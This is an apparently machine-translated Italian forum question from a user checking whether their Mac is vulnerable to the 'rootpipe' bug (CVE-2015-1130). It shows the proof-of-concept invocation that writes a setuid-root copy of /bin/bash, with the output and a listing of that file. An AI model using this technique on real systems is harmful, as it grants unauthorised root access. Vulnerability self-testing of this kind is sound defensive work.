Ho letto post divulgazione di Emil Kvarnhammar di TrueSec ( API backdoor nascosta per i privilegi di root in Apple OS X ) e sto cercando di confermare se sono vulnerabile o meno.
Dopo aver creato uno script exploit.py
con i contenuti del POC di exploit di Emil, eseguo:
$ python exploit.py /bin/bash root-bash
will write file /Users/dserodio/root-bash
Done!
Quindi posso vedere che un eseguibile suid root è stato effettivamente creato:
$ ls -l root-bash
-rwsrwxrwx 1 root Domain Users 1228336 Apr 14 10:51 root-bash
Ma quando lo avvio, non sembra essere una shell di root:
$ exec ./root-bash
$ whoami
dserodio
$ touch foo
$ ls -l foo
-rw-r--r-- 1 dserodi Domain Users 0 Apr 14 11:01 foo
Se uso uno script di shell che esegue id
, crea file, ecc. invece di usare / bin / bash per creare una shell interattiva, i risultati sono gli stessi (es .: creati come root suid ma apparentemente senza root uscita).
Qualcuno può aiutarmi a capire cosa sta succedendo e se sono vulnerabile al bug "rootpipe" (CVE-2015-1130)?